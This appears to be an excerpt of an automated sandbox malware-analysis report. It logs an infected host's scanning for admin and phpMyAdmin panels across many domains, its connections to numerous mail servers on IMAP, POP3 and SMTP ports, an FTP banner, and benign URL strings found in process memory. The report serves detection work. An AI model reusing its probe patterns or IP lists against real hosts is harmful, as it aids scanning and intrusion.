Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gmaso.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.hul.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: bjail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Source: Joe Sandbox View

ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: Joe Sandbox View	IP Address: 198.50.191.95 198.50.191.95
Source: Joe Sandbox View	IP Address: 95.214.26.17 95.214.26.17
Source: Joe Sandbox View	IP Address: 15.197.142.173 15.197.142.173

Source: unknown

Network traffic detected: DNS query count 1838

Source: global traffic	TCP traffic: 192.168.2.4:49739 -> 95.214.26.17:24714
Source: global traffic	TCP traffic: 192.168.2.4:49741 -> 194.49.94.77:16339
Source: global traffic	TCP traffic: 192.168.2.4:49746 -> 37.191.206.197:8443
Source: global traffic	TCP traffic: 192.168.2.4:49748 -> 62.210.105.46:9001
Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 185.244.24.40:8443
Source: global traffic	TCP traffic: 192.168.2.4:49750 -> 89.58.5.0:853
Source: global traffic	TCP traffic: 192.168.2.4:49786 -> 142.44.187.223:9002
Source: global traffic	TCP traffic: 192.168.2.4:51351 -> 3.33.224.147:995
Source: global traffic	TCP traffic: 192.168.2.4:51491 -> 216.69.141.81:143
Source: global traffic	TCP traffic: 192.168.2.4:51497 -> 199.59.243.225:143
Source: global traffic	TCP traffic: 192.168.2.4:52884 -> 3.64.163.50:143
Source: global traffic	TCP traffic: 192.168.2.4:52955 -> 5.161.133.13:995
Source: global traffic	TCP traffic: 192.168.2.4:52958 -> 15.197.204.56:995
Source: global traffic	TCP traffic: 192.168.2.4:52963 -> 15.197.172.60:995
Source: global traffic	TCP traffic: 192.168.2.4:53653 -> 142.251.179.26:995
Source: global traffic	TCP traffic: 192.168.2.4:53657 -> 45.32.206.101:995
Source: global traffic	TCP traffic: 192.168.2.4:56356 -> 213.171.212.244:995
Source: global traffic	TCP traffic: 192.168.2.4:56768 -> 13.248.169.48:995
Source: global traffic	TCP traffic: 192.168.2.4:56769 -> 15.197.142.173:143
Source: global traffic	TCP traffic: 192.168.2.4:56776 -> 54.209.32.212:143
Source: global traffic	TCP traffic: 192.168.2.4:56811 -> 68.183.34.12:995
Source: global traffic	TCP traffic: 192.168.2.4:56941 -> 67.21.93.254:995
Source: global traffic	TCP traffic: 192.168.2.4:56953 -> 216.37.42.12:995
Source: global traffic	TCP traffic: 192.168.2.4:57325 -> 91.107.214.206:995
Source: global traffic	TCP traffic: 192.168.2.4:57368 -> 194.63.248.47:143
Source: global traffic	TCP traffic: 192.168.2.4:57645 -> 157.7.44.163:220
Source: global traffic	TCP traffic: 192.168.2.4:58552 -> 104.238.144.219:995
Source: global traffic	TCP traffic: 192.168.2.4:60012 -> 157.7.44.171:143
Source: global traffic	TCP traffic: 192.168.2.4:60411 -> 64.190.63.111:995
Source: global traffic	TCP traffic: 192.168.2.4:49605 -> 3.94.41.167:587
Source: global traffic	TCP traffic: 192.168.2.4:50757 -> 104.247.82.52:990
Source: global traffic	TCP traffic: 192.168.2.4:50818 -> 145.14.30.248:222

Source: unknown

Network traffic detected: IP country count 12

Source: global traffic	TCP traffic: 192.168.2.4:57474 -> 91.107.214.206:25
Source: global traffic	TCP traffic: 192.168.2.4:51638 -> 45.32.206.101:587
Source: global traffic	TCP traffic: 192.168.2.4:53055 -> 5.161.133.13:587
Source: global traffic	TCP traffic: 192.168.2.4:53536 -> 68.183.34.12:587
Source: global traffic	TCP traffic: 192.168.2.4:58577 -> 157.7.44.163:587
Source: global traffic	TCP traffic: 192.168.2.4:65142 -> 15.197.204.56:587
Source: global traffic	TCP traffic: 192.168.2.4:65338 -> 216.69.141.81:587
Source: global traffic	TCP traffic: 192.168.2.4:65508 -> 13.248.169.48:587
Source: global traffic	TCP traffic: 192.168.2.4:65515 -> 15.197.142.173:587
Source: global traffic	TCP traffic: 192.168.2.4:49605 -> 3.94.41.167:587
Source: global traffic	TCP traffic: 192.168.2.4:51187 -> 199.59.243.225:587
Source: global traffic	TCP traffic: 192.168.2.4:51465 -> 3.64.163.50:587
Source: global traffic	TCP traffic: 192.168.2.4:51471 -> 3.33.224.147:587
Source: global traffic	TCP traffic: 192.168.2.4:53166 -> 142.251.179.26:587
Source: global traffic	TCP traffic: 192.168.2.4:53225 -> 15.197.172.60:587
Source: global traffic	TCP traffic: 192.168.2.4:54973 -> 213.171.212.244:587
Source: global traffic	TCP traffic: 192.168.2.4:54975 -> 67.21.93.254:587
Source: global traffic	TCP traffic: 192.168.2.4:57356 -> 216.37.42.12:587
Source: global traffic	TCP traffic: 192.168.2.4:59689 -> 64.190.63.111:587

Source: unknown

FTP traffic detected: 216.37.42.12:21 -> 192.168.2.4:52866 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 05:22. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 05:22. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 05:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 05:22. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: explorer.exe, 00000001.00000000.1793089251.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1793089251.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1793089251.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 4A1B.exe, 0000000A.00000002.2391636618.000000000316E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ao
Source: explorer.exe, 00000001.00000000.1793089251.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790741511.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 4A1B.exe, 0000000A.00000002.2391636618.000000000316E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: explorer.exe, 00000001.00000000.1791731146.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1794142141.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792259735.0000000008720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: AppLaunch.exe, 00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AppLaunch.exe, 00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
